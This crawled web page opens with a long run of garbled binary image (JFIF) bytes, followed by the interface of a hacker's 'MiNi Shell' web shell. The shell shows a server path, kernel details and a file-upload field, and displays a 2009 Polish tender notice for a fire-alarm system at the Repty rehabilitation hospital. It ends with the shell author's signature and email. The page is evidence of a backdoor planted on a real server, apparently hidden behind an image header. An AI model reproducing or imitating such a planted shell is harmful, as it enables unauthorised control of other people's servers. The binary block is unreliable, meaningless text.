JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/53326-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Wykonanie I etapu systemu sygnalizacji pożaru wraz z systemem nagłośnienia alarmowego w SP ZOZ REPTY GCR</b><br>
<b>Numer ogłoszenia: 53326 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ "Repty" Górnośląskie Centrum Rehabilitacji im. gen. Jerzego Ziętka , ul. Śniadeckiego 1, 42-604 Tarnowskie Góry, woj. śląskie, tel. 032 3901206, faks 032 3901353.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.repty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie I etapu systemu sygnalizacji pożaru wraz z systemem nagłośnienia alarmowego w SP ZOZ REPTY GCR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.

1.1. Przedmiotem zamówienia jest wykonanie systemu sygnalizacji pożaru wraz z systemem nagłośnienia alarmowego w SP ZOZ Repty GCR w Tarnowskich Górach.
1.2. Przedmiotem zamówienia mają być objęte budynki średniowysokie B i C oraz budynek A i E. Obszar zakreślony na rysunkach technicznych objęty jest przetargiem (etap I).
1.3. W pawilonie B znajdują się na trzech kondygnacjach 3 oddziały rehabilitacji schorzeń narządów ruchu po 40 łóżek każdy.
W pawilonie C znajdują się na trzech kondygnacjach 3 oddziały rehabilitacji schorzeń neurologicznych po 40 łóżek każdy.
1.4. Prace montażowe będą się odbywać przy pełnym obłożeniu przez pacjentów w/w oddziałów. Roboty powinny być tak zorganizowane aby gwarantowały możliwość prowadzenia świadczeń zdrowotnych w  przekazanych do montażu instalacji słaboprądowych pawilonach.
1.5. Wykonawca robót winien przedstawić szczegółowy harmonogram prac na tych oddziałach przy zachowaniu szczególnej staranności i dyscypliny z uwagi na leczonych tam chorych.
1.6. SP ZOZ GCR Repty posiada opracowaną dokumentację techniczną na całość zadania (cały obiekt szpitala), jednak z uwagi na przyznane środki finansowe wytypowano z kompleksu szpitala w/w pawilony (I etap). Dokumentacja techniczna została opracowana przez biuro KLK Technologie Informatyczne Sp. z o.o. z Katowic w czerwcu 2005r. 
Przedmiot zamówienia należy wykonać w oparciu o dokumentację techniczną i przedmiar robót. 
1.7. Wspólny Słownik Zamówień (CPV): 45.00.00.00-7, 45.31.20.00-7, 45.31.21.00-8, 45.31.10.00-0, 45.31.11.00-1, 45.31.40.00-1, 45.31.42.00-3, 45.31.43.10-7, 45.41.00.00-4 45.45.30.00-7 45.45.31.00-8
1.8. Od Wykonawcy wymagać się będzie:
a) przestrzegania zasad BHP i przepisów sanitarno - epidemiologicznych w czasie wykonywania robót,
b) wykonania prac zgodnie z dokumentacją i z materiałów określonych w projekcie,                        
c) przedstawienia wszystkich wymaganych certyfikatów i zaświadczeń  kwalifikacyjnych wydanych przez Centrum Naukowo - Badawcze Ochrony Przeciwpożarowej w Józefowie na oferowane urządzenia lub certyfikaty z oznakowaniem CE zgodnie z ustawą z dnia 30 sierpnia 2002r. o systemie oceny zgodności (tj. Dz. U. z 2004r. Nr 204, poz. 2087 ze zm.),
d) stosowania się przez Wykonawcę do procedur i zasad wynikających z posiadania przez Zamawiającego certyfikatów jakości wg ISO 9001 - ISO 14001.

2. Zakres prac.

2.1. W zakres zamówienia wchodzi dostawa urządzeń, materiałów oraz ich zabudowa.
2.2. Zakres prac stanowiących przedmiot zamówienia powinien być wykonany zgodnie z zasadami wiedzy technicznej dotyczącej robót elektrycznych, telekomunikacyjnych i budowlanych oraz wytycznymi producentów zastosowanych urządzeń.
2.3. Szczegółowy zakres prac określa przedmiar robót oraz projekt techniczny. Dokumenty te stanowią całość materiałów składających się na dokumentację projektową. Projekt techniczny i przedmiar robót w oryginale jest do wglądu w GCR Repty  w godz. 900 - 1300 Sekretariat Zastępcy Dyrektora ds. Administracyjnych pok. 209.
2.4. Wykonawca powinien zastosować materiały i urządzenia o parametrach technicznych zgodnych z materiałami i urządzeniami opisanymi w dokumentacji  Zamawiającego.
2.5. Wykonawca powinien wykonać roboty stanowiące przedmiot zamówienia zgodnie ze sztuką budowlaną, specyfikacjami szczegółowymi obowiązującymi przy wykonaniu robót, a także zgodnie z warunkami bezpieczeństwa i ochrony zdrowia. 
Roboty stanowiące przedmiot zamówienia wykonywane będą podczas normalnej pracy i funkcjonowania GCR Repty. W związku z czym Wykonawca podczas wykonywanych prac będzie dostosowywał się do wskazówek i zaleceń personelu szpitala oraz Inspektora Nadzoru Inwestorskiego,  szczególnych uzgodnień będzie wymagała organizacja pracy w działających oddziałach szpitala.
2.6. Wykonawca w formularzu Oferty podaje cenę oferty, którą jest kwota ryczałtowa obejmująca wszystkie koszty wykonania w pełnym zakresie przedmiotu zamówienia. 
Cena oferty (kwota ryczałtowa) w okresie wykonywania zamówienia nie będzie podlegała zmianom, ani korektom.
2.7. Wymagany minimalny okres gwarancji - 24 miesiące na wykonanie robót budowlanych, na urządzenia nie krótszy od okresu gwarancji, jakich udzielił producent. 
Wymagana usługa serwisowa całego systemu (układu) przez okres 12 miesięcy, bez pobierania dodatkowych opłat. Czas przybycia na miejsce celem wykonania naprawy od momentu zgłoszenia awarii maksymalnie 8 godzin.
2.8. Zamawiający umożliwi Wykonawcom przeprowadzenie wizji lokalnej obiektu w godz. od 1100 do 1300  po uprzednim ustaleniu terminu z Kierownikiem Działu Elektrycznego tel. 032-39 01 520 lub 550..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.00-8, 45.31.10.00-0, 45.31.42.00-3, 45.31.20.00-7, 45.31.11.00-1, 45.31.40.00-1, 45.31.43.10-7, 45.41.00.00-4, 45.45.30.00-7, 45.45.31.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w kwocie 5.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące      warunki:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym               i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
a).wykonali co najmniej 2 roboty budowlane w okresie ostatnich pięciu lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,
b).osoby kierujące wykonaniem zamówienia posiadają uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz przedkładają zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego z uiszczeniem aktualnych składek członkowskich (zgodnie z art. 19 ust 3 ustawy o samorządzie zawodowym architektów, inżynierów budowlanych oraz urbanistów);
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności wykazali:
a).informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż wartość przedmiotu zamówienia, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b).polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust 1 i 2 Pzp.
2.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty metodą spełnia/ nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu  na podstawie art. 24 ustawy Pzp Zamawiający żąda następujące dokumenty:
a). oświadczenie o spełnieniu warunków określonych w  art. 22 ust.1 pkt 1-4 Pzp (załącznik nr 2) oraz oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 Pzp  (załącznik nr 3);
b). aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c). aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 4-8 ustawy, wystawioną nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert,
d). aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 9 ustawy, wystawioną nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert,
e). aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega w opłacaniu podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert.  Przedsiębiorcy występujący jako wspólnicy w spółkach cywilnych zobowiązani są dołączyć do oferty zaświadczenia z Urzędu Skarbowego i ZUS o nie zaleganiu w podatkach i składkach na Fundusz Ubezpieczeń Społecznych oraz Fundusz Ubezpieczeń Zdrowotnych wystawionych dla każdego wspólnika oddzielnie, jak również zaświadczenie wystawione na spółkę,
f). dokumenty, o których mowa w pkt 1 ppkt a,b,c,d,e winny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę lub osoby uprawnione do podpisania oferty.

2.	W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi  do wykonania zamówienia, Wykonawca składa następujące dokumenty:
a). wykaz wykonanych robót budowlanych  w okresie ostatnich pięciu lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z których co najmniej dwie odpowiadają swoim rodzajem               i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana należycie (załącznik nr 4);
b). wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował (załącznik nr 5).
c). dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

3.	W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca składa następujące dokumenty:
a). polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, b).informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż wartość przedmiotu zamówienia, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c). dokumenty, o których mowa w pkt 3 ppkt a,b winny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę lub osoby uprawnione do podpisania oferty. 

4.	Dokumenty dodatkowe:
a). pełnomocnictwo do podpisywania dokumentów i składania wyjaśnień, jeżeli ofertę podpisuje pełnomocnik Wykonawcy, w formie oryginału lub kserokopii poświadczonej notarialnie,
b). dowód wniesienia wadium, a w szczególności Zamawiający wymaga wniesienia oryginału dokumentu świadczącego o wniesieniu wadium w formie niepieniężnej lub kopii dokumentu potwierdzającego wniesienie wadium w pieniądzu.

5.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w Rozdz. IX pkt 1 ppkt b,d,e, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a). nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b). nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c). nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne                       i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w Rozdz. IX pkt 1 ppkt c składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w  art. 24 ust 1 pkt 4-8.
3)	Dokumenty, o których mowa w Rozdz. IX pkt 5 ppkt 1 lit. a, b oraz ppkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w Rozdz. IX pkt 5 ppkt 1 lit. c powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Rozdz. IX pkt 5 ppkt 1,2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym oraz organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.repty.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji 
ul. Śniadeckiego 1     
42-604 Tarnowskie Góry      
Sekcja zamówień publicznych p.231.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 11:00, miejsce: SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji 
ul. Śniadeckiego 1     
42-604 Tarnowskie Góry      
Sekcja zamówień publicznych p.231.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com